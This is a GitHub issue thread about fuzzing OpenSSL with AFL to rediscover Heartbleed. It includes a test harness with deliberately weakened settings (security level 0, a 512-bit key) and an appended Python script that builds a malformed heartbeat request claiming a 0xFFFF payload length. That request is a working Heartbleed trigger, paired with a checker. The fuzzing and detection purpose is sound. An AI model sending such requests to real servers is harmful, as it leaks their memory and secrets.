Closed Mambaboy closed 6 years ago
It took a minute or two when I ran it. Will see if I can reproduce.
That's using afl-2.52 and clang-4.0. Similar to what I remember when I first created it.
I just tried again with your seed, and this time it found it in <1minute, 18 paths. So doesn't look like a fluke, and certainly not one that would survive 24hrs fuzzing.
Standard afl debugging required then:
~/local/afl-2.52b/afl-showmap -o map -m none ./handshake < in/1
[+] Instrumented 17 locations (ASAN/MSAN mode, ratio 100%).
(I noticed your steps didn't specify "./config.sh -d" - it's worth including the -d so you've got debug symbols when you do find a crash. Update: turns out that doesn't necessarily help, and you need to pass the log through asan_symbolize.)
Thanks for your reply. I reviewed the process and found there is a change in my code. When compiling the handshake.cc modified according to ANSWERS.md, it fails and outputs this error:
SSL routines:SSL_CTX_use_certificate:ee key too small:ssl/ssl_rsa.c:310
So I added one more line of code:
SSL_CTX_set_security_level(sctx, 0);
Then it compiles successfully. After the modification, the experiment was done entirely according to the tutorial. However, it still does not detect the crash. Is the added code wrong? Or would it impede the detection of the heartbleed bug?
My handshake.cc is as follows:
// Copyright 2016 Google Inc. All Rights Reserved.
// Licensed under the Apache License, Version 2.0 (the "License");
#include <openssl/ssl.h>
#include <openssl/err.h>
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
#include <unistd.h>  /* read, STDIN_FILENO */

#ifndef CERT_PATH
# define CERT_PATH
#endif

SSL_CTX *Init() {
  SSL_library_init();
  SSL_load_error_strings();
  ERR_load_BIO_strings();
  OpenSSL_add_all_algorithms();
  SSL_CTX *sctx;
  /* These asserts have side effects, so this file must not be built with -DNDEBUG. */
  assert(sctx = SSL_CTX_new(TLSv1_method()));
  /* Added to get past "ee key too small" for the 512-bit test key.
   * SSL_CTX_set_security_level() only exists in OpenSSL 1.1.0 and later. */
  SSL_CTX_set_security_level(sctx, 0);
  /* These two files were created with this command:
       openssl req -x509 -newkey rsa:512 -keyout server.key \
           -out server.pem -days 9999 -nodes -subj /CN=a/
   */
  if (!SSL_CTX_use_certificate_file(sctx, "./server.pem", SSL_FILETYPE_PEM)) {
    ERR_print_errors_fp(stderr);
    exit(1);
  }
  assert(SSL_CTX_use_PrivateKey_file(sctx, "./server.key",
                                     SSL_FILETYPE_PEM));
  return sctx;
}

int main() {
  static SSL_CTX *sctx = Init();
  SSL *server = SSL_new(sctx);
  BIO *sinbio = BIO_new(BIO_s_mem());
  BIO *soutbio = BIO_new(BIO_s_mem());
  SSL_set_bio(server, sinbio, soutbio);
  SSL_set_accept_state(server);
  /* TODO: To spoof one end of the handshake, we need to write data to sinbio
   * here */
#ifdef __AFL_HAVE_MANUAL_CONTROL
  __AFL_INIT();
#endif
  uint8_t data[100] = {0};
  /* read() returns ssize_t; -1 signals an error, so keep the signed type. */
  ssize_t size = read(STDIN_FILENO, data, sizeof(data));
  if (size == -1) {
    printf("Failed to read from stdin\n");
    return -1;
  }
  /* Whatever the fuzzer gives us on stdin becomes the client's bytes. */
  BIO_write(sinbio, data, size);
  SSL_do_handshake(server);
  SSL_free(server);
  return 0;
}
I didn't have to make a modification when I tested it earlier - are you definitely on the right version of OpenSSL? That would explain both the harness needing changes and heartbleed not being there.
I'm going to close this, let me know if you're still having issues.
Hi, I have done the experiment as in the tutorial, but only about 78 paths were detected after 24 hours of fuzzing, and the heartbleed vulnerability was not found either. The process is as follows:
AFL_USE_ASAN=1 /afl/afl-clang-fast++ -g handshake.cc openssl/libssl.a openssl/libcrypto.a -o handshake -I openssl/include -ldl
/afl/afl-fuzz -i /seed -o /out -m none -- //handshake
Regards, xiaosatianyu
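The harness posted in this thread reads at most 100 bytes from stdin and hands them to the server-side BIO before calling SSL_do_handshake(), so whether the fuzzer ever reaches the Heartbleed code depends on what the seed looks like. As an added example that is not part of this thread, the afl-training repo or its ANSWERS.md, the Python below builds a seed of the shape the bug needs (a TLS 1.0 ClientHello record followed by a heartbeat request whose declared payload length is larger than the record actually carries) and also parses any seed back into TLS records, flagging heartbeat requests that violate the bound `1 + 2 + payload_length + 16 <= record_length` that the Heartbleed fix (CVE-2014-0160, OpenSSL 1.0.1g) added. The record and heartbeat layouts and that bound are the public protocol and fix details; the cipher suite, the all-zero client random, the one-byte payload and the function names are my own choices for this example. The constructed seed is 75 bytes, so it fits inside the harness's 100-byte read.

```python
import struct
import sys

# TLS record content types and the heartbeat message type we care about.
TLS_HANDSHAKE = 22
TLS_HEARTBEAT = 24
HB_REQUEST = 1
TLS1_0 = b"\x03\x01"


def tls_record(content_type, body, version=TLS1_0):
    """Wrap body in a TLS record header: type(1) version(2) length(2)."""
    return bytes([content_type]) + version + struct.pack(">H", len(body)) + body


def client_hello(version=TLS1_0):
    """Minimal ClientHello: one cipher suite, null compression, no extensions.
    The client random is all zeros (constructed; any 32 bytes will do)."""
    body = (version
            + b"\x00" * 32                 # client random
            + b"\x00"                      # session id length = 0
            + b"\x00\x02" + b"\x00\x2f"    # cipher suites: TLS_RSA_WITH_AES_128_CBC_SHA
            + b"\x01\x00")                 # compression methods: null only
    # Handshake header: type(1) = client_hello, length(3)
    handshake = b"\x01" + struct.pack(">I", len(body))[1:] + body
    return tls_record(TLS_HANDSHAKE, handshake)


def heartbeat_request(claimed_len, payload=b"A", padding=b"\x00" * 16):
    """Heartbeat message: type(1) payload_length(2) payload padding(>=16).
    claimed_len is written into the length field and may disagree with
    len(payload); that disagreement is the Heartbleed trigger."""
    body = bytes([HB_REQUEST]) + struct.pack(">H", claimed_len) + payload + padding
    return tls_record(TLS_HEARTBEAT, body)


def iter_records(data):
    """Yield (content_type, version, declared_length, body) for each record.
    A truncated final record yields whatever bytes are present."""
    off = 0
    while off + 5 <= len(data):
        ctype = data[off]
        version = data[off + 1:off + 3]
        length = struct.unpack(">H", data[off + 3:off + 5])[0]
        body = data[off + 5:off + 5 + length]
        yield ctype, version, length, body
        off += 5 + length


def heartbleed_findings(data):
    """Return [(claimed_payload_len, bytes_actually_present), ...] for every
    heartbeat request whose declared payload does not fit in its record.
    Unpatched 1.0.1f trusts the claimed length and copies that many bytes
    into the response; 1.0.1g rejects when 1 + 2 + claimed + 16 > record length."""
    findings = []
    for ctype, _version, length, body in iter_records(data):
        if ctype != TLS_HEARTBEAT or len(body) < 3 or body[0] != HB_REQUEST:
            continue
        claimed = struct.unpack(">H", body[1:3])[0]
        actual = len(body) - 3  # payload + padding really carried after the 3-byte header
        if 1 + 2 + claimed + 16 > length:
            findings.append((claimed, actual))
    return findings


def make_seed(malicious=True):
    """ClientHello followed by a heartbeat request; malicious=True inflates the length."""
    claimed = 0xFFFF if malicious else 1
    return client_hello() + heartbeat_request(claimed)


if __name__ == "__main__":
    # Usage: python3 make_seed.py > in/heartbleed_seed   (file name is my choice)
    seed = make_seed()
    sys.stdout.buffer.write(seed)
    print("wrote %d bytes, findings: %r" % (len(seed), heartbleed_findings(seed)),
          file=sys.stderr)
```

Run the checker over the seeds already in your `in/` directory as well: if none of them parses into a heartbeat record, AFL has to synthesise content type 24 plus a consistent record length on its own, which is exactly the kind of structured input it finds slowly, and the low path count after 24 hours would be unsurprising.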